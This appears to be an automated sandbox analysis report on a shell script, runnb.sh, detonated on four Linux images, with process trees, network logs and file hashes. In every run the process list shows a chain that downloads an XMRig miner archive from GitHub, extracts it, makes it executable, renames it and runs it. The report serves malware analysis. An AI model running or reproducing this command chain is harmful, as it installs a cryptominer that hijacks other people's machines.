Analysis Overview
SHA256
a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
Threat Level: Shows suspicious behavior
The file runnb.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Reads CPU attributes
Enumerates kernel/hardware configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-30 13:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-30 13:06
Reported
2024-10-30 13:12
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
1s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/sudo | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | /usr/bin/snap | N/A |
| File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | /usr/bin/snap | N/A |
| File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | /usr/bin/snap | N/A |
| File opened for reading | /sys/kernel/mm/transparent_hugepage/hpage_pmd_size | /usr/bin/snap | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/stat | /usr/bin/sudo | N/A |
| File opened for reading | /proc/cgroups | /usr/bin/snap | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/apt | N/A |
| File opened for reading | /proc/cmdline | /usr/bin/snap | N/A |
| File opened for reading | /proc/cmdline | /usr/bin/snap | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/cgroups | /usr/bin/snap | N/A |
| File opened for reading | /proc/cmdline | /usr/bin/snap | N/A |
| File opened for reading | /proc/cgroups | /usr/bin/snap | N/A |
| File opened for reading | /proc/cmdline | /usr/bin/snap | N/A |
| File opened for reading | /proc/filesystems | /bin/tar | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sudo | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/bin/sudo | N/A |
| File opened for reading | /proc/cgroups | /usr/bin/snap | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/fileutl.message.Tv8lpe | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.bJvUo4 | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.Ujb4X0 | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.epORFa | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.4wKluk | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.tUGDrU | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.mY02xY | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.MMujmR | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.VjfRzK | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.kmQrrO | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.HpV0to | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.Vh0yCy | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.TKBu8q | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.Jcx9NA | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.U9uqpu | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.KjCToE | /usr/bin/apt | N/A |
Processes
/tmp/runnb.sh
[/tmp/runnb.sh]
/usr/bin/sudo
[sudo apt install wget]
/usr/bin/apt
[apt install wget]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/bin/sh
[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]
/usr/bin/snap
[/usr/bin/snap advise-snap --from-apt]
/bin/sh
[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]
/usr/bin/snap
[/usr/bin/snap advise-snap --from-apt]
/bin/sh
[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]
/usr/bin/snap
[/usr/bin/snap advise-snap --from-apt]
/bin/sh
[/bin/sh -c [ ! -f /usr/bin/snap ] || /usr/bin/snap advise-snap --from-apt 2>/dev/null || true]
/usr/bin/snap
[/usr/bin/snap advise-snap --from-apt]
/usr/bin/wget
[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]
/bin/tar
[tar xvf xmrigtar.tar.gz]
/bin/chmod
[chmod +x xmrig]
/bin/mv
[mv xmrig cool]
/tmp/cool
[./cool]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 1.1.1.1:53 | github.com | udp |
| US | 1.1.1.1:53 | github.com | udp |
| GB | 195.181.164.14:443 | tcp |
Files
/tmp/fileutl.message.MMujmR
| MD5 | 373fe2f2ef99005d2550a482f09a3e51 |
| SHA1 | 68e6572b55b1e77f7d171ebac7b2579b7a6bd51d |
| SHA256 | 7552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5 |
| SHA512 | def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-30 13:06
Reported
2024-10-30 13:12
Platform
debian9-armhf-20240611-en
Max time kernel
6s
Max time network
7s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/sudo | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sudo | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/bin/sudo | N/A |
| File opened for reading | /proc/self/stat | /usr/bin/sudo | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/apt | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /bin/tar | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/fileutl.message.feOWda | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.hGyOFa | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.FLz5li | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.rhmRNr | /usr/bin/apt | N/A |
Processes
/tmp/runnb.sh
[/tmp/runnb.sh]
/usr/bin/sudo
[sudo apt install wget]
/usr/bin/apt
[apt install wget]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/wget
[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]
/bin/tar
[tar xvf xmrigtar.tar.gz]
/bin/chmod
[chmod +x xmrig]
/bin/mv
[mv xmrig cool]
/tmp/cool
[./cool]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | github.com | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-30 13:06
Reported
2024-10-30 13:12
Platform
debian9-mipsbe-20240611-en
Max time kernel
117s
Max time network
150s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/sudo | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/stat | /usr/bin/sudo | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/apt | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sudo | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/apt | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/sudo | N/A |
| File opened for reading | /proc/filesystems | /bin/tar | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/bin/sudo | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/fileutl.message.0ksS1M | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.9MdXSo | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.SpDNgo | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.UkZHET | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.Cby9mA | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.ObiKey | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.4SnVT5 | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.ChveDP | /usr/bin/apt | N/A |
Processes
/tmp/runnb.sh
[/tmp/runnb.sh]
/usr/bin/sudo
[sudo apt install wget]
/usr/sbin/sendmail
[sendmail -t]
/usr/sbin/sendmail
[sendmail -t]
/usr/bin/apt
[apt install wget]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t67Wc-0000Bg-PL]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t67Wi-0000Bd-5p]
/usr/bin/apt
[apt install wget]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/wget
[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]
/bin/tar
[tar xvf xmrigtar.tar.gz]
/bin/chmod
[chmod +x xmrig]
/bin/mv
[mv xmrig cool]
/tmp/cool
[./cool]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
Files
/var/spool/exim4/input/1t67Wc-0000Bg-PL-D
| MD5 | 29b5f65cec8f10e1d9237bfafd8cfe15 |
| SHA1 | 0f553f30b89e44ffee5818aad2210fd82bf32bd3 |
| SHA256 | b86b2bb584861a5e3b8bf97967009bde0fc62280f39600fd9c234c803aaf6441 |
| SHA512 | 2931246165e2cec85ca12cdd4a9c4cecf9afb4b2d8b2815b850cc9f9439289964965ca15a9641b42dca83429b371d3f769f8af6f5cc5011c691e656c78596887 |
/var/spool/exim4/input/hdr.724
| MD5 | 59c8e7fe07aa10d886a5622d216dc544 |
| SHA1 | e53a9c43d1431f54893a5408a8017743ead8610b |
| SHA256 | 471604ebbe65ddc35263f86d70acc38e8a227fe2cd3bbc390dcbb6d711cfaa80 |
| SHA512 | c9ad288951a0990cee04a91e4ede557b762bce507a22a89c8552792c35c7990e15d707aa0c04b8856951689dd01d9f5edef75334ce51369421b0e453b4213bd3 |
/var/spool/exim4/msglog/1t67Wc-0000Bg-PL
| MD5 | 1ff982473d7d2811859739a172bcf583 |
| SHA1 | d2bbe4a1be37b272af7d0acb7da6ed5a3495c699 |
| SHA256 | 0e77dcd0195ad198b94be3603f8abf5fb697b795e4d930b76608610665ac031d |
| SHA512 | fa52212c6ad9ef9364f22efa1095fde665d4fa4d998ab7fbcc60b41f65a582eb8b6693b0b86021dd106047eaad857703dcd093b30e604f16611321d621c8308f |
/var/mail/user
| MD5 | 595f01a473b87dcc39e302e361f6df08 |
| SHA1 | 25dea5bef0cf97cf31315da0646a0397437ad072 |
| SHA256 | d85665da254724a749f3f45c509c76c71ebda1284c65d6edd8892d9da7124c33 |
| SHA512 | db87eae970e29d06417a57a6d85553745a78ca76fd4e969297a0c41791371612d7ab253633caa146d7968d36b47c59b77f8416e1d4dfd9a2e20b74ae3cb8fa2a |
/var/spool/exim4/input/1t67Wc-0000Bg-PL-J
| MD5 | d7d96d63d643a4ce3e408eba7dfcedc5 |
| SHA1 | c53607f95c5c57beafc1d8266646797a035f76ea |
| SHA256 | 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159 |
| SHA512 | 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3 |
/var/spool/exim4/msglog/1t67Wc-0000Bg-PL
| MD5 | f7c45ad668ded36ddd10c0367e39f6f8 |
| SHA1 | 3a894d2836d02d13f70fc440e809c061ed1ee328 |
| SHA256 | 8f207e2aaa6d3dc408f01d993a6a759d7ddd871b95c3028dc7a1871cf3604bac |
| SHA512 | 9586fa67141a51c7363b884715708683c134402d12f6d8f757055d7e0518174ad2ea9878c79fe4ea510c5a2446ab4c5e94626e6870bac0feaa1f94dd0621e660 |
/var/spool/exim4/input/1t67Wi-0000Bd-5p-D
| MD5 | 8e808517d77ff16d7f6d85e618773d5f |
| SHA1 | c4efef4f2f7fc9bca9dfa463e04221f427e2f868 |
| SHA256 | 39ea94a36c53279733341a715dad7cdead8855014ba1dec922fec93dea206ec3 |
| SHA512 | ed232da15152f741b8fddc799410dad048be911a517c180dd45ce7101414fb68e252771e1f96bf1b7767cd19b132aac0d5d35b66d50eb4eb5e7ba4699bb2ce5a |
/var/spool/exim4/input/hdr.721
| MD5 | 464af924c2dd82cb355ee78804b618f8 |
| SHA1 | 7344b64dd2495ef205f0dbe3bd9c954ca7968bae |
| SHA256 | 032439411b7d4f76fab08cae52b7a24db065a64290fb6199191a7d557c62cf7f |
| SHA512 | 70e7ac84c4a59010c8b0e9e544e456a407cbf4e729996cf2f3dd3be52a491194dc0a8150813d2e514ea24e2ad6822fb0a64e429d382ca626d597f33a48484980 |
/var/spool/exim4/msglog/1t67Wi-0000Bd-5p
| MD5 | ce77a0cffed93d570d31c72c7d613582 |
| SHA1 | 427e46e2284e8904a2dd035571d497e6afcff6fa |
| SHA256 | 1443ec8f0a33ab52ed79e52793f54c5ec1d5608c22acea3ad2aec7a83e6d71f0 |
| SHA512 | e95a638f5e4129bda33556d72b383fb9b2e481e787be2fdda054b4b077b3aa70ba5af6357f07acacfd6a0865d1e3091ee2013db292e200ddd79db3fdc95e4a59 |
/var/mail/user
| MD5 | defb52d953ba1b8cdd8d28da9548691d |
| SHA1 | 0dbe1daa37ad64aa25e312b909bd14d9ea1623e4 |
| SHA256 | 706ae75700886c08a09231c63974a309669ab2b2a35321aca180527c913d2a55 |
| SHA512 | e89a6591192104a776660e1c42a86283a3794cf07323a3ce50ced9595bce81dfa0d1e767d679e6d5f9c3d85eb79445eaa6267c68d167e8b28bc58134a4135487 |
/var/spool/exim4/msglog/1t67Wi-0000Bd-5p
| MD5 | 78dc3e8c66bd615089879ac53d483b98 |
| SHA1 | f9dd7bbbf5c7b447f39a6de989cf24a186571435 |
| SHA256 | 6f405a4e3314b91bea1809bb179fba5e3cecda801b13c2ff1c48640b9984f7d7 |
| SHA512 | dcb52c5cc47f650e08bf6e08fa34fcee7b6f7c3ba864a281668929d17a1cf4a4ced83c196493a5d08a70b7b66f3216f548591e3d6bee2d84ea28554b68046f0a |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-30 13:06
Reported
2024-10-30 13:12
Platform
debian9-mipsel-20240611-en
Max time kernel
51s
Max time network
53s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/sudo | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/sbin/exim4 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sudo | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/bin/sudo | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/sudo | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/sys/kernel/ngroups_max | /usr/sbin/sendmail | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/filesystems | /bin/tar | N/A |
| File opened for reading | /proc/self/stat | /usr/bin/sudo | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/apt | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dpkg | N/A |
| File opened for reading | /proc/self/fd | /usr/bin/apt | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/fileutl.message.ueS1Tj | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.khLB3B | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.SYpnjZ | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.EjbMVs | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.5kH4KV | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.FM4QZg | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.X6KWVX | /usr/bin/apt | N/A |
| File opened for modification | /tmp/fileutl.message.JAGxbL | /usr/bin/apt | N/A |
Processes
/tmp/runnb.sh
[/tmp/runnb.sh]
/usr/bin/sudo
[sudo apt install wget]
/usr/sbin/sendmail
[sendmail -t]
/usr/sbin/sendmail
[sendmail -t]
/usr/bin/apt
[apt install wget]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t67WX-0000Bd-Tl]
/usr/sbin/exim4
[/usr/sbin/exim4 -Mc 1t67WX-0000Ba-U9]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/apt
[apt install wget]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/dpkg
[/usr/bin/dpkg --print-foreign-architectures]
/usr/bin/wget
[wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz]
/bin/tar
[tar xvf xmrigtar.tar.gz]
/bin/chmod
[chmod +x xmrig]
/bin/mv
[mv xmrig cool]
/tmp/cool
[./cool]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-1 | udp |
| US | 1.1.1.1:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
Files
/var/spool/exim4/input/1t67WX-0000Bd-Tl-D
| MD5 | 941d420759e94a1bd868c37f625edb0e |
| SHA1 | 07a5df1665607adc1dca3eae8973194d84f33509 |
| SHA256 | 4cebde6c7e7da64d826a429a647e13d1cee779b1dd21a28ba6b4038399f5ab95 |
| SHA512 | e79314a8786b2fe5f34036297e84c0ae7c042edc9566816f1ddce65ae9a173a8f90824df4e36fa9b3fd18d3dbe9577f13115cc7e5659594c777f378b5e4e23fe |
/var/spool/exim4/input/1t67WX-0000Ba-U9-D
| MD5 | fb161a8d77589e42343a69baac6558c3 |
| SHA1 | da1d6196ad814ac6aceb4f8a5c74c42bb6bb77e0 |
| SHA256 | 4ae583fdd30f59a2ce5a6f622d86ca502aea6868045b2b5b46d7e03fa0f9da4d |
| SHA512 | dbe638525b7db65236d525169cfbdf96ff40db7dbf875419897807f141f1a23bdcb728d1a9bdaf914742722e5c7413b5ba61b5c1d5cac9baac1efe78db1c0a7a |
/var/spool/exim4/input/hdr.718
| MD5 | 48799cda21e70d63c321e8447aef7ec8 |
| SHA1 | e4b5ff6d347bc0167a579ee45f3c60214583578f |
| SHA256 | 79add92d542e684b6a9a5a1846af6e95ec7f1f4b43f0278fcaced2c7d29eb2dd |
| SHA512 | 82bcb959b4cf2f0f331bcec83a2bb616553256775028e641a5cb5b74468ffb0a875816c0b62a01383ca4b71bb92f2a8697ebb3e2c95ea876499c7c0e92578fab |
/var/spool/exim4/msglog/1t67WX-0000Bd-Tl
| MD5 | 8325c366e5037ddfc0286eda5fa5b2e2 |
| SHA1 | 542ca7ae5ed8e1b1d405b6362ce51ce2960fff3a |
| SHA256 | 43cc8dd066396ff583c39678b6844c019ad2e2222dc0a6fcdf8415a7df08ffd3 |
| SHA512 | e22a836ef72c3d7816ab190fda793c67d9f526ea008ad9ed627da70dbc5ea640b5447f5b174fa937d7583e10334eb7b4a3e3162d7f3d4bda1fd37fb4f3661718 |
/var/spool/exim4/msglog/1t67WX-0000Ba-U9
| MD5 | 2633f88076d9fc2543fa50f203e0d08f |
| SHA1 | ad6b4fd63cbc7c131c66639152d4f0a16e5f58b8 |
| SHA256 | 750d8a4120dbea512b80ba7b9b284d4c2b52009c2a52d1d106dab24f0bd1eac9 |
| SHA512 | a12152884afdcdb8e2bcad89690f5e105683ce460876123c41a3c2bbb0d65d6e2ba19e394b262bd3bd3a7c7c74397f6c380ec577b49a02ce474cbb12a7f90ef6 |
/var/mail/user
| MD5 | 2e64547594cb07a79be6167095b3421c |
| SHA1 | ab83381e1eb624ee06dbb5513cfc863fb2ec0099 |
| SHA256 | 7cda1aee71c8b2e2ce4133c99388f0e42abc7bd491fc92691db8375ab70933ae |
| SHA512 | 5d9b98f3a027e785edf86ef07acab7978ac5e1cc48c412c2c73fd7a61836ed779ec7f57831a7f4d44d57ae0756cc11f0139f36fb769a0917210da0964b57e55e |
/var/spool/exim4/input/1t67WX-0000Ba-U9-J
| MD5 | d7d96d63d643a4ce3e408eba7dfcedc5 |
| SHA1 | c53607f95c5c57beafc1d8266646797a035f76ea |
| SHA256 | 21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159 |
| SHA512 | 703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3 |
/var/mail/user
| MD5 | 3306e338f0de9348470695cf0c09db1f |
| SHA1 | 12d9b6006acd4b506cfa50c89ecf0b84e2deb018 |
| SHA256 | a8a474e7234e1a7c4f33c145018f2d235fe2a2a917eea63579cc018384364eac |
| SHA512 | 99f07c204ed386392f5475be50302f644a0197cd65b504c94ede2c169f04d4187d4a5f163094648f14c987913457cf2918ec283b93811dbc19c39971db6e15c3 |
/var/spool/exim4/msglog/1t67WX-0000Ba-U9
| MD5 | e06795efeae2b189486bac86b73396f5 |
| SHA1 | 7cedd0a0713397d1d097712f49dfe56ce0280a48 |
| SHA256 | c6a38cfc3b0bcd0da3e28339e14c1020e95013cb9ec230580bac622e3efc1485 |
| SHA512 | a601fe93788026af3440dbaab44747e3915fccf44956526cfd79f676553e6815f45dd697e7dac099a5008be9660f448415bb71afdf990aed6b6bba3adbbf98ab |
/var/spool/exim4/msglog/1t67WX-0000Bd-Tl
| MD5 | ea08c55f299f53254a3c5d4c3e80cacd |
| SHA1 | 4dd0cea75a44decb69821b37ae43ad3b31bf266b |
| SHA256 | d574187e37c7e4c775b3f08b1fc37fb678c54fd6af681f947808c9e474c7c1b9 |
| SHA512 | d783a6ab3b30114c7a5c19ac4c8dc95abf482967d0b5f061121e24e9132bc7ab894f51b684664d1899a100814548c5f7ab7769b38d52affbebb8ca9c14dc94ee |